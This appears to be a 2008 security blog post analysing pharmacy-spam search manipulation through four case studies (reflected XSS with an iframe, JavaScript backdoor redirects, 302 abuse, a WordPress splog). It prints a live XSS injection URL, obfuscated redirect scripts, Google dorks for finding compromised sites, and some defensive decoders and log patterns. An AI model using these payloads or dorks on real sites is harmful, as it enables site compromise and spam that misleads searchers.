April 30, 2008

Web Spam Techniques

Table of contents
Web Spam Introduction
Black Hat SEO / White Hat SEO
Web Spam Business
Aggressive Black Hat SEO
Web Spam – The online pharmacy industry
Web Spam – Affiliate/Associate programs
Web Spam – Keywords and how to recognise spam links

Web Spam Case Studies – Techniques Exposed

1st Case: XSS + IFRAME
2nd Case: JavaScript Redirection + Backdoor page
3rd Case: 302 Redirection + Scraped site
4th Case: The Splog

Security Considerations
Security Recommendations

Web Spam Introduction

Web Spam Definition: The practice of manipulating web pages in order to cause search engines to rank some web pages higher than they would without any manipulation.

Spammers manipulate search engine results in order to target users. The motive can be commercial, political and/or religious.

Black Hat SEO and White Hat SEO techniques

There are different techniques to manipulate search engine results pages (SERPs):

White-Hat SEO: all web marketing techniques adhering to the webmaster guidelines of major search engines.

Black-Hat SEO: all techniques that do not follow any guidelines. Some of them are considered illegal.

There are two main reasons for manipulating results:

Users trust search engines as a means of finding information. As a consequence, web spammers exploit this trust.

The second reason is that users usually do not look past the first ten results returned by the search engine. This is why White/Black Hat SEO techniques are used.

The Web Spam Business

The first results page (top 10) is a target for many companies and is what the SEO business revolves around. Some SEO businesses and individuals employ both white hat and black hat SEO to increase the visibility and positioning of their clients. In these cases, black hat SEO is applied in moderation and without leaving any footprint. This approach is taken in order not to expose the techniques used. If these techniques are exposed, web spammers need to find new ones. SEO companies using spamming techniques can also be reported by users or even by their clients.

Web Spam - Aggressive Black Hat SEO

Conversely, there are instances where black hat SEO is used aggressively. This is the case with affiliate/associate program web spam. This article focuses specifically on these cases because some of these techniques directly exploit common web application vulnerabilities. As a consequence, web spamming needs to be treated as a threat.

Web Spam - The online pharmacy industry

Let’s focus on a very popular marketplace: online pharmaceuticals. Consider the following statistics for the online pharmacy keywords:

Google:


Yahoo:


Live:


These numbers are not always exact - they are an approximation of the real results.
Businesses on the first search engine results page (SERP) for those keywords need to:

  • Always have a strong visibility/positioning
  • Rank better than competitors

Web Spam - Affiliate/Associate Programs

Businesses in these industries prefer not to spam directly, given the anti-spam laws in the US and European countries (CAN-SPAM Act of 2003, Directive 2002/58/EC). Furthermore, these companies cannot afford to compromise their search engine positioning.

This is one of the reasons why affiliate/associate programs exist. These programs typically provide:

  • Sales increase – supported by attractive earning schemes, advanced tools to manage the account with statistics, and a good reputation (regular payment).
  • Limited liability - the affiliate is used as a scapegoat in case of spam allegations.

Some affiliate/associate programs indirectly allow spam. How is that possible?

  • Some of these affiliate/associate programs do not include terms of agreement on the sign-up page.
  • Some of these companies operate in jurisdictions where spam allegations are not enforceable.
  • In other cases, the anti-spam policies of affiliate/associate programs typically refer to email spam only.

Case of registration form without terms of agreement:



Case of "exotic" jurisdiction:



Spam = Email Spam



Affiliates use aggressive black hat SEO to spam merchant products, which gives them a better chance of increasing revenue. In most cases there is no real enforcement, given the lack of terms of agreement and the definition of spam being restricted to email spam. Also, the affiliate ID is not verified, and the companies generally do not care (except for statistical reasons) where the "click" came from. Basically, it is "legally" convenient for both sides (companies and affiliates) to carry on their business in this way. In the online pharmacy industry, web spammers target specific products such as viagra, cialis and phentermine.

Web Spam - Online pharmacy keywords

Results as of 23rd April 2008:

Keywords                  Google      Yahoo       Live        Spam Links
buy viagra online         11200000    44600000    57400000    G: 4/10, Y: 6/10, L: 10/10
cheap viagra              12100100    36700000    53100000    G: 7/10, Y: 7/10, L: 9/10
buy cialis online         7810000     33400000    25000000    G: 8/10, Y: 9/10, L: 10/10
buy phentermine online    4340000     27000000    52600000    G: 8/10, Y: 8/10, L: 10/10

The last column on the right indicates the number of spam links returned in the top 10 results page of the respective search engine (G: Google, Y: Yahoo, L: Live).

Web Spam - Recognising web spam links

Potential signs of web spam in SERPs:

  • Domain name not pertinent/not associable to the keyword
  • URL composed of more than one level (long URL) + spam keyword in the result
  • URL including specific pages using parameters such as Id, U, Articleid, etc. + spam keyword in the result
  • Domain suffix: gov, edu, org, info, name, net + spam keyword in the result
  • Keyword stuffing – spam keyword in title, description and URL
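
The signs above can be turned into a rough checklist. What follows is only a minimal sketch in JavaScript (Node.js assumed): the function name spamSigns, the sign labels and the shape of the result object (url, title, description) are hypothetical and chosen for illustration. A match is a hint to look closer, not proof of spam.

```javascript
// Sketch only: names, labels and the result shape are assumptions made
// for this illustration, not part of any search engine API.
const PAGE_PARAMS = ["id", "u", "articleid"];
const SUFFIXES = ["gov", "edu", "org", "info", "name", "net"];

function spamSigns(result, keyword) {
  const url = new URL(result.url);
  const host = url.hostname.toLowerCase();
  const words = keyword.toLowerCase().split(/\s+/).filter(Boolean);
  // True when every word of the keyword appears in the given text.
  const hasAll = (s) =>
    words.every((w) => String(s || "").toLowerCase().includes(w));
  const keywordInResult = hasAll(
    [result.title, result.description, result.url].join(" ")
  );

  const signs = [];
  // Domain name not associable to the keyword.
  if (!words.some((w) => host.includes(w))) signs.push("unrelated-domain");
  // URL with more than one path level + spam keyword in the result.
  const levels = url.pathname.split("/").filter(Boolean).length;
  if (levels > 1 && keywordInResult) signs.push("deep-url");
  // Page parameters such as Id, U, Articleid + spam keyword in the result.
  const params = [...url.searchParams.keys()].map((k) => k.toLowerCase());
  if (params.some((k) => PAGE_PARAMS.includes(k)) && keywordInResult) {
    signs.push("page-parameter");
  }
  // Listed domain suffix + spam keyword in the result.
  if (SUFFIXES.includes(host.split(".").pop()) && keywordInResult) {
    signs.push("listed-suffix");
  }
  // Keyword stuffing: keyword in title, description and URL.
  if (hasAll(result.title) && hasAll(result.description) && hasAll(result.url)) {
    signs.push("keyword-stuffing");
  }
  return signs;
}
```

Calling spamSigns with a result URL and the searched keyword returns the list of signs that matched, which can then be reviewed by hand.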

Some examples:







Web Spam Techniques - Case Studies

Let’s go through 4 different web spam cases. This will allow us to better understand the most recent web spam techniques:

1st Case: XSS + IFRAME
2nd Case: JavaScript Redirection + Backdoor page
3rd Case: 302 Redirection + Scraped site
4th Case: Splog

Note that these techniques only refer to the period between the 13th and the 26th April 2008. New web spam techniques are introduced every 2-3 days.

Web Spam Techniques - Case Study I

XSS + IFRAME

Google Dork: spam keywords inurl:iframe and inurl:src

Spam Link: http://thehipp.org/search.php?www=w&query=buy%20cialis%20generic%20%3ciframe%20src=//isobmd.com/cgi-bin/sc.pl?156-1207055546

Ranked in top 10 results page for keywords: buy cialis generic

Site exploited: thehipp.org

Spammed keyword: buy cialis generic

Vulnerable variable: query

Reflected XSS Injection: %3ciframe%20src Injection

Target Site: isobmd.com

SEO Analysis: thehipp.org

PR: 5 I: 1,780 L: 88 Cached: 29 Apr 2008 I: 1,880 L: 441 LD: 19,256 I: 8100 L: 3 Rank: 836238 Age: Aug 2003

Site Backlinks: 79 entries

Backlinks are links which support the promotion of the spam link. These are usually part of the spam link farm. To find backlinks, search for the full URL of the spam link.

This site has been chosen because:

Good PageRank (PR)
Vulnerable to cross site scripting

Let’s now see what really happens:

This is the first GET request: (host: thehipp.org) GET /search.php?www=w&query=buy%20cialis%20generic%20%3ciframe%20src=//isobmd.com/cgi-bin/sc.pl?156-1207055546

The response is 200 OK. HTML is returned and includes the injected IFRAME. This causes the browser to perform another GET request.
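
The injection works because the value of the query variable is echoed back into the page as markup. A minimal sketch of the usual countermeasure, output encoding, is given here in JavaScript. The function names escapeHtml and renderSearchHeading and the heading markup are hypothetical; how thehipp.org actually builds its page is not known.

```javascript
// Escapes the five HTML-significant characters so that reflected input is
// rendered as text instead of being parsed as markup.
function escapeHtml(value) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical page fragment: rawQuery stands for the already URL-decoded
// value of the vulnerable "query" variable.
function renderSearchHeading(rawQuery) {
  return "<h1>Results for: " + escapeHtml(rawQuery) + "</h1>";
}

// The payload from the spam link, decoded as the web server would see it.
const injected = decodeURIComponent(
  "buy%20cialis%20generic%20%3ciframe%20src=//isobmd.com/cgi-bin/sc.pl?156-1207055546"
);
console.log(renderSearchHeading(injected));
```

With the encoding in place, the opening angle bracket of the iframe tag is emitted as &lt; and the browser performs no second request.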

The second GET request: (host: isobmd.com) GET /cgi-bin/sc.pl?156-1207055546

The response is 200 OK. HTML is returned and only contains an obfuscated JavaScript. The obfuscated JavaScript makes use of eval and unescape with a payload of URL-encoded characters.

Obfuscated JavaScript is commonly used to hide the redirection from search engine spiders. This JavaScript reads the referer and the keyword from the URL through the DOM. It then uses these values in another redirection.

So the third GET request: (host: www.finance-leaders.com) GET /feed3.php?keyword=156&feed=8&ref=http%3A//thehipp.org/search.php%3Fwww%3Dw%26query%3Dbuy%2520cialis%2520generic%2520%253ciframe%2520src%3D//isobmd.com/cgi-bin/sc.pl%3F156-1207055546

The response is 200 OK. HTML is returned with a JavaScript using top.location.href to redirect to the spam site.

So the fourth GET request: (host: genericpillsworld.com) GET /product/61/

The response is 200 OK. HTML is returned with the content of the site and the following persistent cookie is set:

Set-Cookie: aff=552; Domain=.genericpillsworld.com; Expires=Wed, 30-Apr-2008 10:20:23 GMT; Path=/

So every purchase made at the site will be associated with the affiliate account 552.
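
To see how the affiliate ID travels with the visitor, the Set-Cookie header above can be split into its parts. This is a minimal sketch, not a full cookie parser; the function name parseSetCookie is hypothetical.

```javascript
// Splits a single Set-Cookie header value into the name/value pair and
// its attributes. Attribute names are lower-cased for easy lookup.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((part) => part.trim());
  const eq = pair.indexOf("=");
  const cookie = {
    name: pair.slice(0, eq),
    value: pair.slice(eq + 1),
    attributes: {},
  };
  for (const attr of attrs) {
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return cookie;
}

const affiliateCookie = parseSetCookie(
  "aff=552; Domain=.genericpillsworld.com; Expires=Wed, 30-Apr-2008 10:20:23 GMT; Path=/"
);
console.log(affiliateCookie.name, affiliateCookie.value);
console.log(affiliateCookie.attributes);
```

The Expires attribute is what makes the cookie persistent, and the leading dot in Domain makes it valid for every host under genericpillsworld.com.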

Web Spam Techniques - Case Study II

JavaScript Redirection + Backdoor page

Russian backdoor Google Dork: "online supportchart" "Name *:" "Comment *:" "All right reserved."

Spam Link: www.daemen.edu/academics/festival/management2007/downloads/thumbs/?item=678

Ranked 1st in top 10 results page for keywords: official shop cialis

Site exploited: daemen.edu
Spammed keyword: official shop cialis
Spam hook: ?item

SEO Analysis: daemen.edu

PR: 6 I: 6,880 L: 312 Cached: 27 Apr 2008 I: 8,710 L: 25 LD: 7,758 I: 18700 L: 0 Rank: 370332 Age: Nov 02, 1996

Site Backlinks: 155 entries

Backlinks Google Dork: www.daemen.edu/academics/festival/management2007/downloads/thumbs/?item=

This site has been chosen because:

Good PageRank (PR)
.EDU is a trusted domain suffix

Let’s now see what really happens:

This is the first GET request: (host: www.daemen.edu) GET /academics/festival/management2007/downloads/thumbs/?item=678

The response is 200 OK. An HTML page is returned. This is the backdoor page. This contains a JavaScript which is used for the redirection and a web page with some content.

The web page contains some text like the following. This is rendered if JavaScript is disabled.

Extract: “you is find hearing medical device cialis floaters AmbienCalled shape dosage Stetes the by& controversial this Dickism one a deciding on cialis floaters you cialis floaters risks semi naked news about must and of celebrities.”

This is an example of language mutation with a Markov chain filter applied. It is used to get the page indexed by the search engines and to distribute the keyword naturally throughout the page, which avoids a ban by the search engines for keyword stuffing.

The JavaScript is hosted on the site itself. Web spammers approach students, who can be easily persuaded to host spam scripts. In this case, the JavaScript makes use of an array, str.length and String.fromCharCode to generate the redirection.

str is an array of numeric values:

for (i=0; i<str.length; i++) {
  gg = str[i] - 364;
  temp = temp + String.fromCharCode(gg);
}
eval(temp);

temp becomes: window.location='http://mafna.info/tds/in.cgi?30&parameter=' + query + ''
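
When analysing a script like this, it is safer to decode the array and print the result than to let eval run it. A minimal sketch follows; the offset 364 is the one from the extract above, while the function names and the sample string (pointing at the placeholder host example.invalid) are made up for the illustration.

```javascript
// Offset from the extract above: every array element is a character
// code with 364 added to it.
const OFFSET = 364;

// Reproduces the obfuscation, so the decoder can be tried on harmless input.
function encode(text) {
  return Array.from(text, (ch) => ch.charCodeAt(0) + OFFSET);
}

// Reverses the obfuscation and returns the hidden script as a string.
// Nothing is passed to eval.
function decode(values) {
  return values.map((v) => String.fromCharCode(v - OFFSET)).join("");
}

// Hypothetical sample, not the real payload.
const sample = encode("window.location='http://example.invalid/'");
console.log(sample.slice(0, 6));
console.log(decode(sample));
```

Pasting the real str array into decode would show the redirection target without the browser ever following it.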

So the second GET request: (host: mafna.info) GET /tds/in.cgi?30&parameter=cialis+floaters

The response is a 302 Temporary redirection to the spam site.

The third GET request: (host: www.official-medicines.org) GET /item/bestsellers/cialis.html

The response is 200 OK. HTML is returned with the content of the pharmacy site.

Web Spam Techniques - Case Study III

302 Redirection + Scraped site

Google Dork: blogtalkradio.com/buy_viagra, or any Google Dork combining a redirection with a spam keyword

Spam Link: http://www.blogtalkradio.com/buy_viagra

Ranked 1st in top 10 results page for keywords: buy viagra

Site exploited: blogtalkradio.com

Spammed keyword: buy viagra

Spam hook: buy_viagra

SEO Analysis: blogtalkradio.com

PR: 6 I: 607,000 L: 4,000 Cached: 29 Apr 2008 I: 165,000 L: 0 LD: 1,035,462 I: 444000 L: 0 Rank: 9102 Age: Nov 1996

Site Backlinks: 27100 entries

Backlinks Google Dork: blogtalkradio.com/buy_viagra

This site has been chosen because:

Good PageRank (PR)
It allows the creation of accounts with a personal page
The web app performs a 302 temporary redirection before loading the account's personal page.

Let’s now see what really happens:

This is the first GET request: (host: www.blogtalkradio.com) GET /buy_viagra

The response is 302 Moved. The Location header then points to:

/CommonControls/GetTimeZone.aspx?redirect=%2fbuy_viagra

The second GET request: GET /CommonControls/GetTimeZone.aspx?redirect=%2fbuy_viagra

The response is 200 OK. HTML is returned containing the account profile page. Users are allowed to upload pictures. This is the picture uploaded by the user buy_viagra:



The image link points to: http://vip-side.com/in.cgi?16&parametr=Viagra

A GET request to the above URL follows. The response is a 302 temporary redirection to: http://pharma.topfindit.org/search.php?q=Viagraq&aff=16205&saff=0

This site is a scraped content site. This means that the site is automatically generated for the keyword passed through the ‘q’ parameter. It then pulls content from third party resources. In this case, PHP with cURL would probably be used.



Red: Keyword used to generate the content of the site
Orange: Content generated automatically and containing links to spam sites. This page pretends to be a search engine. The URLs shown on the site are fake.

Clicking on the first link:

GET /click.php?u=LONG BASE64 String

The base64 decoded string contains: http://208.122.40.114/klik.php?data=LONG encoded string
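
Decoding the ‘u’ parameter takes only a couple of lines. The sketch below assumes Node.js (it relies on Buffer); the function name decodeClickTarget and the sample value are hypothetical, since the real string is abbreviated above.

```javascript
// Extracts the "u" parameter from a click.php style link and decodes it
// from base64. Returns null when the parameter is absent.
function decodeClickTarget(clickUrl, base) {
  const u = new URL(clickUrl, base).searchParams.get("u");
  if (u === null) return null;
  return Buffer.from(u, "base64").toString("utf8");
}

// Hypothetical sample value; the real base64 string is not reproduced here.
const encodedTarget = Buffer.from(
  "http://example.invalid/klik.php?data=abc",
  "utf8"
).toString("base64");

console.log(
  decodeClickTarget(
    "/click.php?u=" + encodeURIComponent(encodedTarget),
    "http://example.invalid"
  )
);
```

Decoding the link offline like this reveals the next hop without clicking through the redirection chain.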

The response is a 302 temporary redirection to the above URL. Another redirection then follows to: http://208.122.40.114/klik.php?data=LONG encoded string

Two more redirections follow from the same host and page (klik.php), each with a different encoded string.

And finally we land here: http://www.tabletslist.com/?product=viagra

The response is 200 OK. HTML of the pharmacy site is returned and a GET request is used to track down the affiliate and the referer:

GET /cmd/rx-partners?ps_t=1209040477625&ps_l=http%3A//www.tabletslist.com/%3Fproduct%3Dviagra&ps_r=http%3A//pharma.topfindit.org/search.php%3Fq%3DViagra&ps_s=6wST1P1OHspM
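
The tracking request can be unpacked to see what is reported back. The sketch below uses the standard URL parser; the meaning given to each ps_ parameter (landing page, referer, millisecond timestamp, session token) is an assumption inferred from the values, not documented behaviour of the site.

```javascript
// Unpacks the tracking request. The field names on the returned object
// are guesses based on what each parameter appears to contain.
function parseTracking(requestPath, origin) {
  const params = new URL(requestPath, origin).searchParams;
  return {
    landingPage: params.get("ps_l"),
    referrer: params.get("ps_r"),
    // Assumed to be a Unix timestamp in milliseconds.
    timestamp: new Date(Number(params.get("ps_t"))),
    session: params.get("ps_s"),
  };
}

const tracking = parseTracking(
  "/cmd/rx-partners?ps_t=1209040477625" +
    "&ps_l=http%3A//www.tabletslist.com/%3Fproduct%3Dviagra" +
    "&ps_r=http%3A//pharma.topfindit.org/search.php%3Fq%3DViagra" +
    "&ps_s=6wST1P1OHspM",
  "http://www.tabletslist.com"
);
console.log(tracking.landingPage);
console.log(tracking.referrer);
console.log(tracking.timestamp.toISOString());
```

The decoded ps_r value shows that the scraped content site is passed along as the referer.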

Web Spam Techniques - Case Study IV

The Splog (Blog Spam = Splog)

Google Dorks:

inurl:certified + spam keyword
inurl:discount + spam keyword
inurl:google-approved + spam keyword
inurl:fda-approved + spam keyword

Spam Link: www.prospect-magazine.co.uk/?certified=307

Ranked 2nd in top 10 results page for keywords: buy from certified pharmacy

SEO Analysis: prospect-magazine.co.uk

PR: 6 I: 15,000 L: 3,390 Cached: 27 Apr 2008 I: 19,600 L: 22,290 LD: 117,865 I: 166000 L: 3 Rank: 165573 Age: Apr 14, 1997

Site Backlinks: 5580 entries

Backlinks Google Dork: www.prospect-magazine.co.uk/?certified=

This site has been chosen because:

Good PageRank (PR)
It uses a vulnerable version of WordPress blog

Let’s now see what really happens:

This is the first GET request: (host: prospect-magazine.co.uk) GET /?certified=307

The response is 302 temporary redirection.

The Location header points to: http://sevensearch.net/delta/search.php?q=buy+from+certified

But how is this possible?

The main page of the site contains a JavaScript which checks the URL for the existence of the following variables:

certified
discount
fda-approved

The JavaScript also checks whether the referer is a SERP. If JavaScript is not enabled or any of these conditions is not satisfied, the user is shown the main page of the site.

This is an extract of the JavaScript on the main page.

document.URL.indexOf("?certified=")!=-1 || document.URL.indexOf("?discount=")!=-1 || document.URL.indexOf("?fda-approved=")!=-1) && ((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)){window.location="http://sevensearch.net/delta/search.php?q="+r.substring(q+2+t.length).split("&")[0];}</script>
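
The extract is easier to follow when rewritten as a plain function that returns the redirection target instead of performing it. This is a sketch under two assumptions that the extract does not confirm: r holds the referer (document.referrer) and t holds the name of the search engine's query parameter, for example "q". The function name redirectTarget is hypothetical.

```javascript
// Spam hooks checked in the page URL by the extract above.
const HOOKS = ["?certified=", "?discount=", "?fda-approved="];

// Returns the URL the visitor would be sent to, or null when the script
// would leave the visitor on the main page.
// pageUrl  : stands in for document.URL
// referrer : stands in for r (assumed to be document.referrer)
// param    : stands in for t (assumed search query parameter name)
function redirectTarget(pageUrl, referrer, param = "q") {
  if (!HOOKS.some((hook) => pageUrl.indexOf(hook) !== -1)) return null;

  let q = referrer.indexOf("?" + param + "=");
  if (q === -1) q = referrer.indexOf("&" + param + "=");
  if (q === -1) return null;

  // Skip the separator, the parameter name and "=", then cut at the next "&".
  const keyword = referrer.substring(q + 2 + param.length).split("&")[0];
  return "http://sevensearch.net/delta/search.php?q=" + keyword;
}

console.log(
  redirectTarget(
    "http://prospect-magazine.co.uk/?certified=307",
    "http://www.google.com/search?q=buy+from+certified&hl=en"
  )
);
```

A visitor who types the address directly has no search referer, so the function returns null and the ordinary main page is shown. This keeps the redirection out of sight of the site owner.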

Back to our redirection - so the second GET request follows: (host: sevensearch.net)
GET /pharma/search.php?q=buy+from+certified

The response is 200 OK. The HTML is returned with a scraped content site. From here, the scenario is similar to the previous case study. The link then redirects to an online pharmacy site with another GET request that tracks the affiliate.

Another variant of this web spam exploited WordPress with a vulnerable XML-RPC.php (v2.3.3). This allowed the spammer to edit posts of other users on the blog. Some victims of this technique:

www.pixelpost.org/?certified=100
http://paulocoelhoblog.com/?pharma-certified=55
www.vermario.com/blog/?google-approved=3619

By comparing the actual page and the cached one, it is possible to understand the attack. The cached page is full of generated text, user comments and links to the sevensearch.net scraped content site.

Security Considerations

Web application vulnerabilities can be used for other purposes as well: SPAM for instance!

Cross Site Scripting, 302 redirection and web app vulnerabilities in popular blog software can all be used for this purpose.

Therefore our risk perception needs to include threats related to web spamming as well. In simple words: if your site has a good PR and it is vulnerable, it becomes a potential candidate for web spamming.

Security Recommendations

Besides the standard security recommendations for any web application, the following are suggested:

Subscribe the site to Google Webmaster Tools and Yahoo Site Explorer, and periodically check incoming and outgoing links.

Set a Google Alert on the site – this will notify you of any changes related to the site in the SERPs.

Check/monitor web server logs constantly

Disable 302 temporary redirection if used

Periodically check web server directory and source code of the web application for any presence of backdoor.
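
Log monitoring can start with a simple scan for the hooks seen in the case studies. The following is a minimal sketch: the pattern list covers only the iframe injection and the splog parameters described in this article, and the names SUSPICIOUS and flagRequests are hypothetical. The sample log lines are invented for the illustration.

```javascript
// Patterns taken from the case studies in this article. A real deployment
// would need a broader and regularly updated list.
const SUSPICIOUS = [
  { name: "iframe-injection", pattern: /(%3c|<)\s*iframe/i },
  {
    name: "splog-hook",
    pattern: /[?&](certified|discount|fda-approved|google-approved|pharma-certified)=/i,
  },
];

// Returns one entry per pattern matched by each log line.
function flagRequests(logLines) {
  const hits = [];
  for (const line of logLines) {
    for (const { name, pattern } of SUSPICIOUS) {
      if (pattern.test(line)) hits.push({ name, line });
    }
  }
  return hits;
}

// Invented request lines in the style of an access log.
const sampleLog = [
  "GET /search.php?www=w&query=buy%20cialis%20generic%20%3ciframe%20src=//isobmd.com/cgi-bin/sc.pl?156-1207055546 HTTP/1.1",
  "GET /?certified=307 HTTP/1.1",
  "GET /index.html HTTP/1.1",
];
for (const hit of flagRequests(sampleLog)) {
  console.log(hit.name + ": " + hit.line);
}
```

Requests flagged this way are worth comparing against the search engine cache of the same URL, as described in the fourth case study.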

Disclaimer

All SEO results and statistics have been taken during the following days: 13 to 26 April 2008. All techniques reported in this presentation only refer to the above timeframe. I am not responsible for any of the data disclosed in this presentation. All information used for this presentation is publicly available and can only be used for educational purposes.
